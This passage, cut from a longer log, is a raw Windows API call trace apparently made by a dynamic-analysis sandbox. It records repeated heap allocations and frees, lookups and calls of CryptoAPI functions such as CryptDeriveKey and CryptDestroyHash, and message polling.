RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0220.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0220.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0220.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0220.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0220.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0220.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0220.402] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0220.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0220.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0220.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0220.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0220.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0220.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0220.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0220.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0220.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0220.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0220.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0220.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0220.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0220.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0220.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0220.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0220.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51598 [0220.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51598, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0220.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0220.404] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0220.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0220.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0220.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0220.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0220.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0220.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0220.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0220.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0220.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0220.405] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87110, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0220.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0220.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0220.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0220.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0220.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0220.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0220.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0220.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0220.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0220.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0220.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0220.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.408] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0220.409] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0220.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a68 [0220.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0220.409] CryptDestroyHash (hHash=0xa87110) returned 1 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0220.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0220.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0220.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0220.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 